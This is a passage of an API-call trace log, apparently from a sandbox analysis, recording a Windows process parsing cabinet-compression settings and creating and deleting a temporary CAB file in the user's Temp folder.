_Str2="DestinationDir") returned -1 [0255.645] _strcmpi (_Str1="DestinationDir", _Str2="DestinationDir") returned 0 [0255.645] atoi (_Str="1%% - %2 (%3 of %4)") returned 1 [0255.645] atoi (_Str="2 (%3 of %4)") returned 2 [0255.645] atoi (_Str="3 of %4)") returned 3 [0255.645] atoi (_Str="4)") returned 4 [0255.645] _vsnprintf (in: _DstBuf=0x27e87fb530, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87fb498 | out: _DstBuf=" 0.00") returned 6 [0255.645] _vsnprintf (in: _DstBuf=0x27e87fb538, _MaxCount=0x1f7, _Format="%s", _ArgList=0x27e87fb498 | out: _DstBuf="01D4756785E0F97F09") returned 18 [0255.646] _vsnprintf (in: _DstBuf=0x27e87fb54c, _MaxCount=0x1e3, _Format="%ld", _ArgList=0x27e87fb498 | out: _DstBuf="1") returned 1 [0255.646] strspn (_Str="1", _Control=" ") returned 0x0 [0255.646] strpbrk (_Str="1", _Control=" ") returned 0x0 [0255.646] _vsnprintf (in: _DstBuf=0x27e87fb54f, _MaxCount=0x1e0, _Format="%ld", _ArgList=0x27e87fb498 | out: _DstBuf="1") returned 1 [0255.646] strspn (_Str="1", _Control=" ") returned 0x0 [0255.646] strpbrk (_Str="1", _Control=" ") returned 0x0 [0255.646] atoi (_Str="1%% - %2 (%3 of %4)") returned 1 [0255.651] atoi (_Str="2 (%3 of %4)") returned 2 [0255.651] atoi (_Str="3 of %4)") returned 3 [0255.651] atoi (_Str="4)") returned 4 [0255.651] printf (_Format="%s%s\r") returned 38 [0255.762] _strcmpi (_Str1="Cabinet", _Str2="Compress") returned -14 [0255.762] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="Compress") returned -14 [0255.762] _strcmpi (_Str1="CabinetNameTemplate", _Str2="Compress") returned -14 [0255.762] _strcmpi (_Str1="ChecksumWidth", _Str2="Compress") returned -7 [0255.762] _strcmpi (_Str1="ClusterSize", _Str2="Compress") returned -3 [0255.762] _strcmpi (_Str1="Compress", _Str2="Compress") returned 0 [0255.762] atoi (_Str="1") returned 1 [0255.762] _strcmpi (_Str1="Cabinet", _Str2="CompressionType") returned -14 [0255.762] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="CompressionType") returned -14 [0255.762] _strcmpi (_Str1="CabinetNameTemplate", _Str2="CompressionType") returned -14 [0255.762] _strcmpi (_Str1="ChecksumWidth", _Str2="CompressionType") returned -7 [0255.762] _strcmpi (_Str1="ClusterSize", _Str2="CompressionType") returned -3 [0255.762] _strcmpi (_Str1="Compress", _Str2="CompressionType") returned -105 [0255.762] _strcmpi (_Str1="LongSourceFileNames", _Str2="CompressionType") returned 9 [0255.762] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="CompressionType") returned -4 [0255.762] _strcmpi (_Str1="CompressionType", _Str2="CompressionType") returned 0 [0255.762] _strcmpi (_Str1="MSZIP", _Str2="MSZIP") returned 0 [0255.762] _strcmpi (_Str1="Cabinet", _Str2="Cabinet") returned 0 [0255.762] atoi (_Str="1") returned 1 [0255.762] _strcmpi (_Str1="Cabinet", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="CabinetNameTemplate", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="ChecksumWidth", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="ClusterSize", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="Compress", _Str2="LongSourceFileNames") returned -9 [0255.762] _strcmpi (_Str1="LongSourceFileNames", _Str2="LongSourceFileNames") returned 0 [0255.762] atoi (_Str="0") returned 0 [0255.762] _strcmpi (_Str1="Cabinet", _Str2="ClusterSize") returned -11 [0255.762] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="ClusterSize") returned -11 [0255.762] _strcmpi (_Str1="CabinetNameTemplate", _Str2="ClusterSize") returned -11 [0255.762] _strcmpi (_Str1="ChecksumWidth", _Str2="ClusterSize") returned -4 [0255.763] _strcmpi (_Str1="ClusterSize", _Str2="ClusterSize") returned 0 [0255.763] atol (_Str="512") returned 512 [0255.763] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="Compress", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskFileCount") returned -1 [0255.763] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskFileCount") returned -10 [0255.763] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskFileCount") returned -9 [0255.763] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskFileCount") returned -9 [0255.763] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskFileCount") returned -9 [0255.763] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskFileCount") returned -9 [0255.763] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskFileCount") returned -7 [0255.763] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskFileCount") returned -7 [0255.763] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskFileCount") returned -6 [0255.763] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskFileCount") returned -4 [0255.763] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskFileCount") returned -4 [0255.764] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskFileCount") returned -1 [0255.764] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskFileCount") returned 0 [0255.764] atol (_Str="224") returned 224 [0255.764] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="MaxDiskSize%d", _ArgList=0x27e87fb1d8 | out: _DstBuf="MaxDiskSize1") returned 12 [0255.764] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize1") returned -1 [0255.764] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize1") returned -10 [0255.764] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize1") returned -9 [0255.765] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize1") returned -9 [0255.765] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize1") returned -9 [0255.765] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize1") returned -9 [0255.765] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize1") returned -7 [0255.765] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize1") returned -7 [0255.765] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize1") returned -6 [0255.765] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFooter2", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFooter3", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfFooter4", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader1", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader2", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader3", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader4", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader5", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfHeader6", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="InfSectionOrder", _Str2="MaxDiskSize1") returned -4 [0255.765] _strcmpi (_Str1="MaxCabinetSize", _Str2="MaxDiskSize1") returned -1 [0255.765] _strcmpi (_Str1="MaxDiskFileCount", _Str2="MaxDiskSize1") returned -13 [0255.765] _strcmpi (_Str1="MaxDiskSize", _Str2="MaxDiskSize1") returned -49 [0255.765] _strcmpi (_Str1="MaxErrors", _Str2="MaxDiskSize1") returned 1 [0255.765] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="MaxDiskSize1") returned 5 [0255.765] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="MaxDiskSize1") returned 5 [0255.766] _strcmpi (_Str1="ReservePerFolderSize", _Str2="MaxDiskSize1") returned 5 [0255.766] _strcmpi (_Str1="RptFileName", _Str2="MaxDiskSize1") returned 5 [0255.766] _strcmpi (_Str1="SourceDir", _Str2="MaxDiskSize1") returned 6 [0255.766] _strcmpi (_Str1="UniqueFiles", _Str2="MaxDiskSize1") returned 8 [0255.766] _strcmpi (_Str1="DiskDirectory1", _Str2="MaxDiskSize1") returned -9 [0255.766] _strcmpi (_Str1="CabinetName1", _Str2="MaxDiskSize1") returned -10 [0255.766] atoi (_Str="1") returned 1 [0255.766] _vsnprintf (in: _DstBuf=0x27e87fb030, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faf98 | out: _DstBuf="MaxDiskSize1") returned 12 [0255.766] atoi (_Str="1") returned 1 [0255.766] _strcmpi (_Str1="Cabinet", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="CabinetNameTemplate", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="ChecksumWidth", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="ClusterSize", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="Compress", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="LongSourceFileNames", _Str2="MaxDiskSize") returned -1 [0255.766] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="CompressionType", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="CompressionLevel", _Str2="MaxDiskSize") returned -10 [0255.766] _strcmpi (_Str1="CompressionMemory", _Str2="MaxDiskSize") returned -10 [0255.767] _strcmpi (_Str1="DestinationDir", _Str2="MaxDiskSize") returned -9 [0255.767] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="MaxDiskSize") returned -9 [0255.767] _strcmpi (_Str1="DiskLabelTemplate", _Str2="MaxDiskSize") returned -9 [0255.767] _strcmpi (_Str1="DoNotCopyFiles", _Str2="MaxDiskSize") returned -9 [0255.767] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="MaxDiskSize") returned -7 [0255.767] _strcmpi (_Str1="FolderSizeThreshold", _Str2="MaxDiskSize") returned -7 [0255.767] _strcmpi (_Str1="GenerateInf", _Str2="MaxDiskSize") returned -6 [0255.767] _strcmpi (_Str1="InfCabinetHeader", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfCommentString", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfDateFormat", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfDiskHeader", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfDiskLineFormat", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfFileHeader", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfFileLineFormat", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfFileName", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfFooter", _Str2="MaxDiskSize") returned -4 [0255.767] _strcmpi (_Str1="InfFooter1", _Str2="MaxDiskSize") returned -4 [0255.767] atol (_Str="0") returned 0 [0255.767] _ltoa_s (in: _Val=0, _DstBuf=0x27e87fb330, _Size=0xc, _Radix=10 | out: _DstBuf="0") returned 0x0 [0255.767] _strcmpi (_Str1="0", _Str2="360K") returned -3 [0255.767] atol (_Str="362496") returned 362496 [0255.767] atol (_Str="0") returned 0 [0255.767] _strcmpi (_Str1="0", _Str2="720K") returned -7 [0255.767] atol (_Str="730112") returned 730112 [0255.767] atol (_Str="0") returned 0 [0255.767] _strcmpi (_Str1="0", _Str2="1.2M") returned -1 [0255.767] atol (_Str="1213952") returned 1213952 [0255.767] atol (_Str="0") returned 0 [0255.767] _strcmpi (_Str1="0", _Str2="1.25M") returned -1 [0255.767] atol (_Str="1250304") returned 1250304 [0255.767] atol (_Str="0") returned 0 [0255.767] _strcmpi (_Str1="0", _Str2="1.44M") returned -1 [0255.767] atol (_Str="1457664") returned 1457664 [0255.767] atol (_Str="0") returned 0 [0255.768] _strcmpi (_Str1="0", _Str2="1.68M") returned -1 [0255.768] atol (_Str="1716224") returned 1716224 [0255.768] atol (_Str="0") returned 0 [0255.768] _strcmpi (_Str1="0", _Str2="DMF168") returned -52 [0255.768] atol (_Str="1716224") returned 1716224 [0255.768] atol (_Str="0") returned 0 [0255.768] _strcmpi (_Str1="0", _Str2="CDROM") returned -51 [0255.768] atol (_Str="681984000") returned 681984000 [0255.768] atol (_Str="0") returned 0 [0255.768] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="DiskDirectory%d", _ArgList=0x27e87fb1d8 | out: _DstBuf="DiskDirectory1") returned 14 [0255.768] _mkdir (_Path="C:\\") returned -1 [0255.768] _mkdir (_Path="C:\\Users") returned -1 [0255.768] _mkdir (_Path="C:\\Users\\CIIHMN~1") returned -1 [0255.769] _mkdir (_Path="C:\\Users\\CIIHMN~1\\AppData") returned -1 [0255.769] _mkdir (_Path="C:\\Users\\CIIHMN~1\\AppData\\Local") returned -1 [0255.769] _mkdir (_Path="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned -1 [0255.769] GetCurrentProcessId () returned 0x200 [0255.769] _vsnprintf (in: _DstBuf=0x27e87fb245, _MaxCount=0xda, _Format="CAB%5.5d.TMP", _ArgList=0x27e87fb208 | out: _DstBuf="CAB00512.TMP") returned 12 [0255.769] _open (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\CAB00512.TMP" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\cab00512.tmp"), _OpenFlag=1282) returned 7 [0255.770] _close (_FileHandle=7) returned 0 [0255.770] _unlink (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\CAB00512.TMP") returned 0 [0255.771] _vsnprintf (in: _DstBuf=0x27e8c1574c, _MaxCount=0x7ff, _Format="DiskLabel%d", _ArgList=0x27e87fb1d8 | out: _DstBuf="DiskLabel1") returned 10 [0255.771] _strcmpi (_Str1="Cabinet", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="ClusterSize", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="Compress", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskLabel1") returned 8 [0255.771] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="CompressionType", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="CompressionLevel", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="CompressionMemory", _Str2="DiskLabel1") returned -1 [0255.771] _strcmpi (_Str1="DestinationDir", _Str2="DiskLabel1") returned -4 [0255.771] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskLabel1") returned -8 [0255.771] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskLabel1") returned 67 [0255.771] _strcmpi (_Str1="DoNotCopyFiles", _Str2="DiskLabel1") returned 6 [0255.771] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="DiskLabel1") returned 2 [0255.771] _strcmpi (_Str1="FolderSizeThreshold", _Str2="DiskLabel1") returned 2 [0255.771] _strcmpi (_Str1="GenerateInf", _Str2="DiskLabel1") returned 3 [0255.771] _strcmpi (_Str1="InfCabinetHeader", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfCommentString", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfDateFormat", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfDiskHeader", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfDiskLineFormat", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfFileHeader", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfFileLineFormat", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfFileName", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfFooter", _Str2="DiskLabel1") returned 5 [0255.771] _strcmpi (_Str1="InfFooter1", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfFooter2", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfFooter3", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfFooter4", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader1", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader2", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader3", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader4", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader5", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfHeader6", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="InfSectionOrder", _Str2="DiskLabel1") returned 5 [0255.772] _strcmpi (_Str1="MaxCabinetSize", _Str2="DiskLabel1") returned 9 [0255.772] _strcmpi (_Str1="MaxDiskFileCount", _Str2="DiskLabel1") returned 9 [0255.772] _strcmpi (_Str1="MaxDiskSize", _Str2="DiskLabel1") returned 9 [0255.772] _strcmpi (_Str1="MaxErrors", _Str2="DiskLabel1") returned 9 [0255.772] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="DiskLabel1") returned 14 [0255.772] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="DiskLabel1") returned 14 [0255.772] _strcmpi (_Str1="ReservePerFolderSize", _Str2="DiskLabel1") returned 14 [0255.772] _strcmpi (_Str1="RptFileName", _Str2="DiskLabel1") returned 14 [0255.772] _strcmpi (_Str1="SourceDir", _Str2="DiskLabel1") returned 15 [0255.772] _strcmpi (_Str1="UniqueFiles", _Str2="DiskLabel1") returned 17 [0255.772] _strcmpi (_Str1="DiskDirectory1", _Str2="DiskLabel1") returned -8 [0255.772] _strcmpi (_Str1="CabinetName1", _Str2="DiskLabel1") returned -1 [0255.772] atoi (_Str="1") returned 1 [0255.773] _vsnprintf (in: _DstBuf=0x27e87fb030, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87faf98 | out: _DstBuf="DiskLabel1") returned 10 [0255.773] atoi (_Str="1") returned 1 [0255.773] _strcmpi (_Str1="Cabinet", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="ClusterSize", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="Compress", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskLabelTemplate") returned 8 [0255.773] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="CompressionType", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="CompressionLevel", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="CompressionMemory", _Str2="DiskLabelTemplate") returned -1 [0255.773] _strcmpi (_Str1="DestinationDir", _Str2="DiskLabelTemplate") returned -4 [0255.773] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskLabelTemplate") returned -8 [0255.773] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DiskLabelTemplate") returned 0 [0255.773] _vsnprintf (in: _DstBuf=0x27e8c15f9c, _MaxCount=0xff, _Format="Disk %d", _ArgList=0x27e87fb1d8 | out: _DstBuf="Disk 1") returned 6 [0255.773] _vsnprintf (in: _DstBuf=0x27e87fb2a0, _MaxCount=0x1f, _Format="InfDiskLineFormat%d", _ArgList=0x27e87faee8 | out: _DstBuf="InfDiskLineFormat1") returned 18 [0255.773] _strcmpi (_Str1="Cabinet", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="Compress", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskLineFormat1") returned 3 [0255.773] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="CompressionType", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskLineFormat1") returned -6 [0255.773] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskLineFormat1") returned -5 [0255.773] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskLineFormat1") returned -5 [0255.773] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskLineFormat1") returned -5 [0255.774] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskLineFormat1") returned -5 [0255.774] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskLineFormat1") returned -3 [0255.774] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskLineFormat1") returned -3 [0255.774] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskLineFormat1") returned -2 [0255.774] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDiskLineFormat1") returned -1 [0255.774] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDiskLineFormat1") returned -1 [0255.774] _strcmpi (_Str1="InfCommentString", _Str2="InfDiskLineFormat1") returned -1 [0255.774] _strcmpi (_Str1="InfDateFormat", _Str2="InfDiskLineFormat1") returned -8 [0255.774] _strcmpi (_Str1="InfDiskHeader", _Str2="InfDiskLineFormat1") returned -4 [0255.774] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfDiskLineFormat1") returned -49 [0255.774] _strcmpi (_Str1="InfFileHeader", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFileName", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFooter", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFooter1", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFooter2", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFooter3", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfFooter4", _Str2="InfDiskLineFormat1") returned 2 [0255.774] _strcmpi (_Str1="InfHeader", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader1", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader2", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader3", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader4", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader5", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfHeader6", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="InfSectionOrder", _Str2="InfDiskLineFormat1") returned 15 [0255.774] _strcmpi (_Str1="MaxCabinetSize", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi (_Str1="MaxDiskFileCount", _Str2="InfDiskLineFormat1") returned 4 [0255.774] _strcmpi 